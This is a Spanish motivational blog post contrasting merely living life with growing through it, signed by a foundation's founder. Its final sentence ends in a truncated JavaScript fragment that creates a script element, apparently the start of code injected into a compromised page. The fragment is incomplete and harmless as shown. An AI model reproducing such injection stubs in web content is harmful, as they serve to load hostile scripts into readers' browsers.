Vivir la vida o evolucionar en la Vida

Evolucionar en la vida es saberme levantar y encontrar la llave para volverme a sentir en plenitud

Vivir la vida es sobrellevarla. Evolucionar en la vida es aprender de ella y buscar siempre ser mejor.

Vivir la vida es buscar con quien salir el fin de semana. Evolucionar en la vida es rodearme de gente que me nutra y me haga ser mejor.

Vivir la vida es pasar mi tiempo leyendo noticias y blogs superficiales. Evolucionar en la vida es ocupar mi tiempo en hacer que la vida de otra persona sea mejor por haberme conocido.

Vivir la vida es para algunos tener una maestría o un doctorado. Evolucionar en la vida es compartir ese conocimiento con gente que lo necesita.

Vivir la vida es para algunos casarse y tener hijos. Evolucionar en la vida es respetar a mi esposo/a  y lograr que nuestros hijos amen y respeten su entorno.

Pasar la vida teniéndolo todo sin sentirse pleno es vivirla. Evolucionar en la vida es saberme levantar y encontrar la llave para volverme a sentir en plenitud a pesar de mis problemas.

Vivir la vida es repelar de todo lo que pasa en mi entorno. Evolucionar en la vida es concentrarme en mi para dar lo mejor y no en lo que hacen los demás para distraer mis frustraciones.

Vivir la vida es “sentirme por todo”. Evolucionar en la vida es reconocer que los sentimientos no son responsabilidad de nadie más que propios y que como creo que me ven los demás es cotidianamente como me veo y valoro yo misma.

Las personas que evolucionan a pesar de sus defectos nutren su espiritualidad, disfrutan a su familia y no tienen tiempo para el drama porque están tan distraídos con sus vidas que no se fijan en si alguien no los saludo o no les mando un mensaje por su cumpleaños son personas que han pasado por problemas y se han sabido sobreponer,  por ello entienden que la vida está en continuo cambio, que nada ni nadie es estático y que la diferencia entre evolucionar con la vida y vivir la vida está en reconocer las lecciones que se me presentan y aprender de ellas.

Podemos pasar la vida viviéndola y estar muy cómodos así. Evolucionar en la vida es una decisión que empieza por hacer pequeños cambios en las cosas que hacemos y las personas con las que nos rodeamos.

Por eso debo concluir con que se debe vivir por obligación y evolucionar por convicción.var d=document;var s=d.createElement(‘script’);

nayelipereznegron

Presidenta y fundadora de la Fundación Luchando Por Ángeles Pequeños (LPAP).